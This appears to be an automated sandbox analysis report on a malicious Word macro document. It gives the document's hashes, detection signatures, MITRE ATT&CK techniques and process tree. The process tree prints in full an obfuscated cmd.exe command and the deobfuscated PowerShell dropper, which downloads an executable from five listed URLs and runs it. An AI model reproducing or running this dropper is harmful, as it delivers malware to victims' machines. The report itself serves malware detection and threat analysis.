9b99ae32bd51d49aca7926b9002545c408008acba23db0467142c2a7f9336617

Analysis

max time kernel
101s
max time network
24s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
13/09/2024, 00:20

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

dd4f7c11093ec643eb87a79ce886567b_JaffaCakes118.doc
Size

156KB
MD5

dd4f7c11093ec643eb87a79ce886567b
SHA1

cb3110f9f7aff09689cbb4aae2cf1ab723df9794
SHA256

9b99ae32bd51d49aca7926b9002545c408008acba23db0467142c2a7f9336617
SHA512

173dde39f9c0b9519b2b0404e0ab51669ae793edc4fe0ad9ea394e53f64341dd7186a02cbbf10f71964447dd52b93641dbec3d1baa28d984c571b218659de10e
SSDEEP

3072:HxjnB29gb8onwJ1vxkZy8f/xiHm8VAzy3X7:HxydJbkZy8Xym8VAzy3X

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://mikevictor.me/3pzsx

exe.dropper

http://faciusa.com/Qmb

exe.dropper

http://prahan.com/YNH

exe.dropper

http://lucianomoraes.com.br/BtDELY

exe.dropper

http://lcmtreinamento.com.br/RMd

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	4636	2428	cmd.exe	28

Blocklisted process makes network request 2 IoCs

flow	pid	Process
6	4796	powershell.exe
8	4796	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4796	powershell.exe
4796	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2428	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
4796	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4796	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2428	WINWORD.EXE
2428	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2428 wrote to memory of 2432	2428	WINWORD.EXE	29
PID 2428 wrote to memory of 2432	2428	WINWORD.EXE	29
PID 2428 wrote to memory of 2432	2428	WINWORD.EXE	29
PID 2428 wrote to memory of 2432	2428	WINWORD.EXE	29
PID 2428 wrote to memory of 4636	2428	WINWORD.EXE	30
PID 2428 wrote to memory of 4636	2428	WINWORD.EXE	30
PID 2428 wrote to memory of 4636	2428	WINWORD.EXE	30
PID 2428 wrote to memory of 4636	2428	WINWORD.EXE	30
PID 4636 wrote to memory of 4732	4636	cmd.exe	33
PID 4636 wrote to memory of 4732	4636	cmd.exe	33
PID 4636 wrote to memory of 4732	4636	cmd.exe	33
PID 4636 wrote to memory of 4732	4636	cmd.exe	33
PID 4732 wrote to memory of 4796	4732	cmd.exe	34
PID 4732 wrote to memory of 4796	4732	cmd.exe	34
PID 4732 wrote to memory of 4796	4732	cmd.exe	34
PID 4732 wrote to memory of 4796	4732	cmd.exe	34

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dd4f7c11093ec643eb87a79ce886567b_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2428
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c cMD.ExE /v:/C " Set }`$,=-\/\__-//-/-\__ -\\_-/-\_-_///_ _/_/-\\_\/\--/- -_/\-\_\_-_\/-/ \-_/--\/_\-\//_ /_-_-_\/\_\-\// \\\-/\_-_-/-/_/ __/-\_//\/_\-\- //_\-/_--_/\\-\ /-\\-_-_\_/\-// -/_\-/\__-\-//\ _\\_/\_--_///-\ \//\_\_--\-/-/_ _\\\//-_//-_--\ /-_\/-_/__\\-/- -/\_\_\/-_/-\-/ _--/\/\/_\_--/_ \--_\/--/_\\_/_}//\-_/-_\_/-_-\}_-\/\\/-_\_/-/_{\-\//-_-/__\/\-h/\-\____-/\\//-c-/_\__/-/\-_/\-t/\_-\\\__/-/_-/a/_/_/\__\---\\-c/-_--_\_/_\\//\}-_/-_///\-_\\\_;_\-_/-__\-//-\/k/__-\\--\/\-_/_a--/\/\_-__/\\-_e-\_\//_\/_-_/-\r\_\/-_///_\---\b--\\-/\/\_/-_/_;/\\_-_//\-_\-/_I_\-\-//_-_-\\//w-\\-\\_--_/_//_u_\\_//_---/-/\_$\_/\-__-\-///\_ -/_/-\_\_-/_\\/s/_\--//\-_\_\/-s\_/\/__-//\-_\-e\-\-_\_/-/_-_\/c//_/_/_\-\\_-\-o--\__\-\_//\/-_r/-_/-/\-\-_\__/P-__/\///-_\\-_\-\/-\_-_-\///_\_t-//-_-\/_/\\-\_r\/_/_--/-\\_-/_a\---/_-_/__\//\t\\--//_/\\-_/-_S---\_/_/\\_\//_;/\-_//_\-/-_-_\)\-\\-_//\/_-__/I-\_-_\\_//\_--/w/-\\_/_-\_-/-_\u-_/-\_/-/\/_\-\$_//__/_-\\-/\-- \__-//_\//--\\-,-\_\-/-\/-_/_/_w_-\/-/_/-\__-\/p__\-//\\/_/\---c\-\//_-_-__-\//$_/-/_/-\\-__-/\(-\-\_-/_-/__\//e-__\\--_/_-\///l\-/-\_\-//__/-_i_\\/--//--_\\__F\-__//-_\\/-\/-d-_//-_-\\/_\_\-a/_\--/_/\\\__-/o/__--_/\-\-/_\/l//_/-/_\-\_\\--n/_/\_--_-\-\\_/w---__//-\\_/\_\o\///_/_--\_--\\D\_\/___/-\-/\--._\_/\//-_-/_\--r/\_//\_\_--\-/-B-\_\/_--_///-_\G__/\_-\-/-/-\_/$__-\/--/-\_\/_\{\-/\__/-/_\-_/\y\/\_\-/\---/_/_r-/-_-_/\\_/_/\-t_//\__/-\/\-_-\{-___\\/\-/--/\/)\/__--\-_\//-\_V\___-\\-\/_//--q\-_-/\/_-/_/-_\C_-_/-\\-/_\\-//$--__\-///_\/_-\ \/\_\___/\/----n\/_-/\\-__-\/_/i__-\/\-_\//-/-\ //-\-\/-\\/__-_w/\--/\_/__\_/\-p/_\__-\-\//_/\-c--_\\/-_\-/_//_$__\\///--__-\\-(_/\-\/-_-\-_/_\h\\_-_//-/-_\/_\c/\-_/_\-_/_--\/a\_-\-\/-/__/_\/e\//-_/\\-\-__/_r_//\_-/_-\\_\/-o--\__/-_/-/\/\_f\_/_-_\/_\-/\/-;\-_/_\/\_\---/_'-/_-\/_\\-\/_/-e__\\\__//\/----x-__-\-\\/_///\-e--__\_\/\//_--/._\-\/_/__--/\-\'/---/\-___\\/\/+\/_\\--\/__/--_h__/\--\/_-/\\/_k_//-\_\\_-/\_-/k/\-/-\-___-\//\$_\_-\\--_\/_-//+__/\\_-/--/_\-/'\///-\-__\--__\\_-\/\-//-__-_\/'-\-_/\-/\__-/_\+--/\-_-\/\_\__/p/\_-/\_--\_\-_/m/_\_/-\_/-\\/-_e\/_-_/-\/_\_\/-t-_-\\/_\//-__-\:_-\_-_\-//\/-_\v-_-_//\_-\/\-/\n-/_//-\_--\_/\\e\__--/\\///_\_-$\_\/\-_/_-/-_\-=--_-\\_//\_\/_/I__\\--/_-///\\-w_/\_-\/\_//_\--u//-__\-_-/\\\-_$/\-_-\_\_-//_-\;\_-_/-/_\-_\//\'\/_/\-//-\_-__-1-_//--\__//\\\_3-\_/\/_/_\\_--/5/_-_--\/_/-_\/\'/_-_--/_\\-//\_ _\__\_/\-/-//\-=-\_\\\/_/-//__- -_\-_/-/_/\/\_\h__---/__/\\/\-\k\/_\\--/--_/_\/k-\\_--_///\/_-_$///\_-_-\_\--\/;/--\_\_\\/_--/_)\/_\-_\//-_-\_-'-//\\\-/-___\/-@//\\\_-/-/\__--'\\_//-\_-/_-_/\(_\\/--/-_\\_//-t/\-__/\//_--\\-i-/_\-\_\/_\/-/-l_//\\-_\\-_/--_p-__\/__\--/-\\/S-_-_/\/\_/\\_-/.-_-\--_//\//\__'-\-/\_\_/\_-_-/d_/_/\-_\/\/-_\-M_\_/--\-_\-//_\R_//_/-\-\__/-\-//_-/-/_\\_\/_-\r_/-_--/\_\_/\-\b/--_\/\-/__/\\-.__-\\/_///--\-_m/\\\-/\_-__-/_/o\-\-//_-\_\_-/_c\-\_//_\/\-_-/-.\-/-_/_\\/\/--_o---_//\/_\-/_\_t_-\//\//_\\__--n-/\-_/\\-_\/_-_e-_-_///\\_\/-\_m_/_-/\\-/\_--\/a\-___/_\-/\/\-/n__-\_\/-//\/-_-i\--\/\-_-\//___e-/\/\/_\\-/-__-r\\//---//____\-t-\/_/\/__-\-/-\m///\_---_/\_\\-c/_\_\_\\_-///--l/_--/\\_\\_/-_-/\-/-\___-\\_//-//\_-_/_/_\/-\-\:_-\-\\-/_-\//__p-_//\__--_\/\-/t_/-__/\\\/\-/--t-_/\/\_\-_\--/_h__/_\\/-_-/\--\@-/-\_\\__\/-//-Y\-///\_/-\__-\-L_\_-\_/---/\//_E---\/__-\\/__\/D/_/\-\--\_/\__/t--\//_/_-/\_\-\B_/-/_/_/-\\_-\-/-\\_\-\_-_//-_/r_\-//\__//--_-\b//-_/\/-\--\_\_._//\\\/-_\-/-__m\-\/__\_/\/--/-o_-/-\\-_\/\/-/_c/_-//_-/-\\\_\-.\--_-/_-_\/\/\/s//-\/-_-/-\__\_e/__/-//_\\-\_--a-\\/_-/-_/-_\/_r//\-\\_-__-/_\-o_\/-\-_--///\\_m\-/-\_/\-\-_/_/o//_-\\_/_-\/-_\n\--___-_///\\/\a_-_\-/\\/-\//_-i\/_/\-_/--/_\-_c-/_-\//-__\_-\\u-/-_/\_/\/\--_\l_/\---\/_/\_-\//-\/__\/__---\///\/--/-\__/\/-__:\/_--\_--_/\_/\p/_/\--\__-\/_/\t_-_/\\--/-\/__/t-///\_-\_\-_/_\h-_/-\///\\_-_\-@__/\/\---\-_\/_H\-_\_\\_/-/-_//N\_\\/_---//__-/Y\_///--\\_-_\-_//\_-_-/_/\-_-\/m\-\\___-\/_/-/-o_/\-_-\-/\__-\/c_/\\_-\_-\/_--/./__\\-/_-\\-_/-n\_\///-_-\_/-_-a--_/\__/\/\\_--h_\_/-\\//-\__/-a-/\\__/_/-_/-\-r\-\-_\_/--\_///p/-\\/-_-\__-/_//-/_\/-\_/\--_\_/\/-\/\/\--_/__-:_\_-_\-\/-/_-//p//\-_\_\-__-//-t__\///--\/_\_-\t\-_/\-\/_//_\_-h\-//-___-\-//\_@//\-\____-/--\/b_-\/-\_//\/_-_-m__/-/\\/_/\--_\Q-\\__/\-/--/_/\/_/_-//_-_/\\\--m\-\/_/-\\__--_/o\_-__--\/\///\-c-/\_-//-\/___-\.-\-/\___\//-_/\a_/__-\\_-///\--s/__-/\--\_\/-/_u\/_--//\/_\-_-\i/_--\_//\\-\-/_c_-/-/_-\_/\\\/-a/\\-_\-/_//_-\-f\-\_--//-\/\/__//\-\\_-_/_-_/\//\\-\/\_//--_/_-:/_-_--_//_\-\\\p/--_-/_\_\\_-\/t-___/-/-/\\\-_\t--\\-\-\_//_//_h-_\//\\/-__/_--@\_\//\--_\__/--x___\\\_-/-/-/-/s_-/\/_/---\\__/z__\-/\-//_/\-_-p-\_///_\_\-/-_-3/\//_\_\-\-__--/-//-\\_\_/\-/-_e_-/-_\_/\-/\_/\m_-\-//_\_/\-\/_._/-\-/_\\_/_-\/r/_-/-_/\\\-/_-_o\_\-\/--//-_/_\t\/-_-/\\/__\/--c/-__\/-\-/_\_-/i/\/--_\\-/__-/_v-\-\_\-_-/_//\_e/\\/-__\/-\/__-k\_-\-__-_/-\///i__/-/_--/\\/\\_m\/_\--\-//_\-__//__-_/\\/---/\_/_/\/-\\_---/_\_:-_\-__/-\/-/_\\p-\_-_-_\-\///_\t-/\\/\\____---/t\/--\_\\/--_//_h__/_-\\-//-\/\_'\___/-_\\/-/\-/=---_/-__/\/_/\\V-/-\-/\\____-/\q/-\_-/-\_\\__//C--__/-\_/\\\/_/$//--/__/__\\\--;/\/--___\/-\-_\t-\-\///\_\_/--_n\\-_-\_///\-_-/e__/\---\/_\/\_/i-/\_-__//-_\/-\l\--__\-_/_/\/-/C-/-/\//--\__\\_b\_-/-___\\///--e_/--_-/\\\/-/_\W_-_/\-/\-_-\_//.__\/-_\\-\_--//t_\/\/\/\_-/_--_e-\_-\\//_\--__/N__/_/\\_//--\-- -__\//\/--/_\\_t/_/_-/-\_/\--_\c--\_\_/\/-_//\-e\/-\_///_-_-\_-j/--\-_\\-/\_/_/b-\/-_///-\\_\_-o_\_-/\-_\-//\-_-_-/-\/\_\-/_\_-w-_\///\-_\\__--e\_/-_\_/_/--\/\n//-\//\___--_\-=-//--\__\\-_/_\r//-\-_-\\-__/\/B_-/\_-/\/--__\\G__\\/--/\_/-/_-$_/-\-\\/\_/-__- --_\__\_//\-/-/l-/\/\-/_/-_\-_\l/-_-\\-\\/_/__-e\-_\/\-//-\__-_h\//-\-\___/-_/\s/\_-_\/\-/--/\_r-\___//\\_-/--/e__\/_/\-\\/_---w\-_\-//\__/\/_-o_-_/--\/_\-\_/\p&& fOr /l %q iN ( 5599, -16 , 15 ) Do seT *{?`=!*{?`!!}`$,:~ %q, 1!&&IF %q lSs 16 CAlL %*{?`:**{?`!=% "
  2⤵
  - Process spawned unexpected child process
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4636
- - C:\Windows\SysWOW64\cmd.exe
    cMD.ExE /v:/C " Set }`$,=-\/\__-//-/-\__ -\\_-/-\_-_///_ _/_/-\\_\/\--/- -_/\-\_\_-_\/-/ \-_/--\/_\-\//_ /_-_-_\/\_\-\// \\\-/\_-_-/-/_/ __/-\_//\/_\-\- //_\-/_--_/\\-\ /-\\-_-_\_/\-// -/_\-/\__-\-//\ _\\_/\_--_///-\ \//\_\_--\-/-/_ _\\\//-_//-_--\ /-_\/-_/__\\-/- -/\_\_\/-_/-\-/ _--/\/\/_\_--/_ \--_\/--/_\\_/_}//\-_/-_\_/-_-\}_-\/\\/-_\_/-/_{\-\//-_-/__\/\-h/\-\____-/\\//-c-/_\__/-/\-_/\-t/\_-\\\__/-/_-/a/_/_/\__\---\\-c/-_--_\_/_\\//\}-_/-_///\-_\\\_;_\-_/-__\-//-\/k/__-\\--\/\-_/_a--/\/\_-__/\\-_e-\_\//_\/_-_/-\r\_\/-_///_\---\b--\\-/\/\_/-_/_;/\\_-_//\-_\-/_I_\-\-//_-_-\\//w-\\-\\_--_/_//_u_\\_//_---/-/\_$\_/\-__-\-///\_ -/_/-\_\_-/_\\/s/_\--//\-_\_\/-s\_/\/__-//\-_\-e\-\-_\_/-/_-_\/c//_/_/_\-\\_-\-o--\__\-\_//\/-_r/-_/-/\-\-_\__/P-__/\///-_\\-_\-\/-\_-_-\///_\_t-//-_-\/_/\\-\_r\/_/_--/-\\_-/_a\---/_-_/__\//\t\\--//_/\\-_/-_S---\_/_/\\_\//_;/\-_//_\-/-_-_\)\-\\-_//\/_-__/I-\_-_\\_//\_--/w/-\\_/_-\_-/-_\u-_/-\_/-/\/_\-\$_//__/_-\\-/\-- \__-//_\//--\\-,-\_\-/-\/-_/_/_w_-\/-/_/-\__-\/p__\-//\\/_/\---c\-\//_-_-__-\//$_/-/_/-\\-__-/\(-\-\_-/_-/__\//e-__\\--_/_-\///l\-/-\_\-//__/-_i_\\/--//--_\\__F\-__//-_\\/-\/-d-_//-_-\\/_\_\-a/_\--/_/\\\__-/o/__--_/\-\-/_\/l//_/-/_\-\_\\--n/_/\_--_-\-\\_/w---__//-\\_/\_\o\///_/_--\_--\\D\_\/___/-\-/\--._\_/\//-_-/_\--r/\_//\_\_--\-/-B-\_\/_--_///-_\G__/\_-\-/-/-\_/$__-\/--/-\_\/_\{\-/\__/-/_\-_/\y\/\_\-/\---/_/_r-/-_-_/\\_/_/\-t_//\__/-\/\-_-\{-___\\/\-/--/\/)\/__--\-_\//-\_V\___-\\-\/_//--q\-_-/\/_-/_/-_\C_-_/-\\-/_\\-//$--__\-///_\/_-\ \/\_\___/\/----n\/_-/\\-__-\/_/i__-\/\-_\//-/-\ //-\-\/-\\/__-_w/\--/\_/__\_/\-p/_\__-\-\//_/\-c--_\\/-_\-/_//_$__\\///--__-\\-(_/\-\/-_-\-_/_\h\\_-_//-/-_\/_\c/\-_/_\-_/_--\/a\_-\-\/-/__/_\/e\//-_/\\-\-__/_r_//\_-/_-\\_\/-o--\__/-_/-/\/\_f\_/_-_\/_\-/\/-;\-_/_\/\_\---/_'-/_-\/_\\-\/_/-e__\\\__//\/----x-__-\-\\/_///\-e--__\_\/\//_--/._\-\/_/__--/\-\'/---/\-___\\/\/+\/_\\--\/__/--_h__/\--\/_-/\\/_k_//-\_\\_-/\_-/k/\-/-\-___-\//\$_\_-\\--_\/_-//+__/\\_-/--/_\-/'\///-\-__\--__\\_-\/\-//-__-_\/'-\-_/\-/\__-/_\+--/\-_-\/\_\__/p/\_-/\_--\_\-_/m/_\_/-\_/-\\/-_e\/_-_/-\/_\_\/-t-_-\\/_\//-__-\:_-\_-_\-//\/-_\v-_-_//\_-\/\-/\n-/_//-\_--\_/\\e\__--/\\///_\_-$\_\/\-_/_-/-_\-=--_-\\_//\_\/_/I__\\--/_-///\\-w_/\_-\/\_//_\--u//-__\-_-/\\\-_$/\-_-\_\_-//_-\;\_-_/-/_\-_\//\'\/_/\-//-\_-__-1-_//--\__//\\\_3-\_/\/_/_\\_--/5/_-_--\/_/-_\/\'/_-_--/_\\-//\_ _\__\_/\-/-//\-=-\_\\\/_/-//__- -_\-_/-/_/\/\_\h__---/__/\\/\-\k\/_\\--/--_/_\/k-\\_--_///\/_-_$///\_-_-\_\--\/;/--\_\_\\/_--/_)\/_\-_\//-_-\_-'-//\\\-/-___\/-@//\\\_-/-/\__--'\\_//-\_-/_-_/\(_\\/--/-_\\_//-t/\-__/\//_--\\-i-/_\-\_\/_\/-/-l_//\\-_\\-_/--_p-__\/__\--/-\\/S-_-_/\/\_/\\_-/.-_-\--_//\//\__'-\-/\_\_/\_-_-/d_/_/\-_\/\/-_\-M_\_/--\-_\-//_\R_//_/-\-\__/-\-//_-/-/_\\_\/_-\r_/-_--/\_\_/\-\b/--_\/\-/__/\\-.__-\\/_///--\-_m/\\\-/\_-__-/_/o\-\-//_-\_\_-/_c\-\_//_\/\-_-/-.\-/-_/_\\/\/--_o---_//\/_\-/_\_t_-\//\//_\\__--n-/\-_/\\-_\/_-_e-_-_///\\_\/-\_m_/_-/\\-/\_--\/a\-___/_\-/\/\-/n__-\_\/-//\/-_-i\--\/\-_-\//___e-/\/\/_\\-/-__-r\\//---//____\-t-\/_/\/__-\-/-\m///\_---_/\_\\-c/_\_\_\\_-///--l/_--/\\_\\_/-_-/\-/-\___-\\_//-//\_-_/_/_\/-\-\:_-\-\\-/_-\//__p-_//\__--_\/\-/t_/-__/\\\/\-/--t-_/\/\_\-_\--/_h__/_\\/-_-/\--\@-/-\_\\__\/-//-Y\-///\_/-\__-\-L_\_-\_/---/\//_E---\/__-\\/__\/D/_/\-\--\_/\__/t--\//_/_-/\_\-\B_/-/_/_/-\\_-\-/-\\_\-\_-_//-_/r_\-//\__//--_-\b//-_/\/-\--\_\_._//\\\/-_\-/-__m\-\/__\_/\/--/-o_-/-\\-_\/\/-/_c/_-//_-/-\\\_\-.\--_-/_-_\/\/\/s//-\/-_-/-\__\_e/__/-//_\\-\_--a-\\/_-/-_/-_\/_r//\-\\_-__-/_\-o_\/-\-_--///\\_m\-/-\_/\-\-_/_/o//_-\\_/_-\/-_\n\--___-_///\\/\a_-_\-/\\/-\//_-i\/_/\-_/--/_\-_c-/_-\//-__\_-\\u-/-_/\_/\/\--_\l_/\---\/_/\_-\//-\/__\/__---\///\/--/-\__/\/-__:\/_--\_--_/\_/\p/_/\--\__-\/_/\t_-_/\\--/-\/__/t-///\_-\_\-_/_\h-_/-\///\\_-_\-@__/\/\---\-_\/_H\-_\_\\_/-/-_//N\_\\/_---//__-/Y\_///--\\_-_\-_//\_-_-/_/\-_-\/m\-\\___-\/_/-/-o_/\-_-\-/\__-\/c_/\\_-\_-\/_--/./__\\-/_-\\-_/-n\_\///-_-\_/-_-a--_/\__/\/\\_--h_\_/-\\//-\__/-a-/\\__/_/-_/-\-r\-\-_\_/--\_///p/-\\/-_-\__-/_//-/_\/-\_/\--_\_/\/-\/\/\--_/__-:_\_-_\-\/-/_-//p//\-_\_\-__-//-t__\///--\/_\_-\t\-_/\-\/_//_\_-h\-//-___-\-//\_@//\-\____-/--\/b_-\/-\_//\/_-_-m__/-/\\/_/\--_\Q-\\__/\-/--/_/\/_/_-//_-_/\\\--m\-\/_/-\\__--_/o\_-__--\/\///\-c-/\_-//-\/___-\.-\-/\___\//-_/\a_/__-\\_-///\--s/__-/\--\_\/-/_u\/_--//\/_\-_-\i/_--\_//\\-\-/_c_-/-/_-\_/\\\/-a/\\-_\-/_//_-\-f\-\_--//-\/\/__//\-\\_-_/_-_/\//\\-\/\_//--_/_-:/_-_--_//_\-\\\p/--_-/_\_\\_-\/t-___/-/-/\\\-_\t--\\-\-\_//_//_h-_\//\\/-__/_--@\_\//\--_\__/--x___\\\_-/-/-/-/s_-/\/_/---\\__/z__\-/\-//_/\-_-p-\_///_\_\-/-_-3/\//_\_\-\-__--/-//-\\_\_/\-/-_e_-/-_\_/\-/\_/\m_-\-//_\_/\-\/_._/-\-/_\\_/_-\/r/_-/-_/\\\-/_-_o\_\-\/--//-_/_\t\/-_-/\\/__\/--c/-__\/-\-/_\_-/i/\/--_\\-/__-/_v-\-\_\-_-/_//\_e/\\/-__\/-\/__-k\_-\-__-_/-\///i__/-/_--/\\/\\_m\/_\--\-//_\-__//__-_/\\/---/\_/_/\/-\\_---/_\_:-_\-__/-\/-/_\\p-\_-_-_\-\///_\t-/\\/\\____---/t\/--\_\\/--_//_h__/_-\\-//-\/\_'\___/-_\\/-/\-/=---_/-__/\/_/\\V-/-\-/\\____-/\q/-\_-/-\_\\__//C--__/-\_/\\\/_/$//--/__/__\\\--;/\/--___\/-\-_\t-\-\///\_\_/--_n\\-_-\_///\-_-/e__/\---\/_\/\_/i-/\_-__//-_\/-\l\--__\-_/_/\/-/C-/-/\//--\__\\_b\_-/-___\\///--e_/--_-/\\\/-/_\W_-_/\-/\-_-\_//.__\/-_\\-\_--//t_\/\/\/\_-/_--_e-\_-\\//_\--__/N__/_/\\_//--\-- -__\//\/--/_\\_t/_/_-/-\_/\--_\c--\_\_/\/-_//\-e\/-\_///_-_-\_-j/--\-_\\-/\_/_/b-\/-_///-\\_\_-o_\_-/\-_\-//\-_-_-/-\/\_\-/_\_-w-_\///\-_\\__--e\_/-_\_/_/--\/\n//-\//\___--_\-=-//--\__\\-_/_\r//-\-_-\\-__/\/B_-/\_-/\/--__\\G__\\/--/\_/-/_-$_/-\-\\/\_/-__- --_\__\_//\-/-/l-/\/\-/_/-_\-_\l/-_-\\-\\/_/__-e\-_\/\-//-\__-_h\//-\-\___/-_/\s/\_-_\/\-/--/\_r-\___//\\_-/--/e__\/_/\-\\/_---w\-_\-//\__/\/_-o_-_/--\/_\-\_/\p&& fOr /l %q iN ( 5599, -16 , 15 ) Do seT *{?`=!*{?`!!}`$,:~ %q, 1!&&IF %q lSs 16 CAlL %*{?`:**{?`!=% "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4732
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell $GBr=new-object Net.WebClient;$CqV='http://mikevictor.me/3pzsx@http://faciusa.com/Qmb@http://prahan.com/YNH@http://lucianomoraes.com.br/BtDELY@http://lcmtreinamento.com.br/RMd'.Split('@');$kkh = '531';$uwI=$env:temp+'\'+$kkh+'.exe';foreach($cpw in $CqV){try{$GBr.DownloadFile($cpw, $uwI);Start-Process $uwI;break;}catch{}}
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
b3c74f3d4ad8c19b3dc0ee27a45dc7da

SHA1
13d722d50ad35da84d18161565adcaabf5a1f874

SHA256
0eb718907dcae140684d2f0860e5a855b1226a0b771635ae9274ea34cb81e0d9

SHA512
68a7d775fb299d4ab4c229fde7e630be7645a2770c02cd4c25bf0096656b7204e1fba3b24ab64dbeee290a47c62a773a0bf625a1a9e05d32c6ba5dcdf098ba35

Download Submit
memory/2428-30-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-44-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-5-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-6-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-42-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-41-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-40-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-39-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-38-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-37-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-36-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-35-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-34-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-10-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-7-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-28-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-43-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-4-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-33-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-32-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-31-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-0-0x000000002F241000-0x000000002F242000-memory.dmp

Filesize
4KB

Download
memory/2428-2-0x00000000713DD000-0x00000000713E8000-memory.dmp

Filesize
44KB

Download
memory/2428-29-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-13-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-26-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-25-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-23-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-24-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-22-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-21-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-20-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-19-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-18-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-17-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-16-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-15-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-14-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
memory/2428-27-0x0000000000470000-0x0000000000570000-memory.dmp

Filesize
1024KB

Download
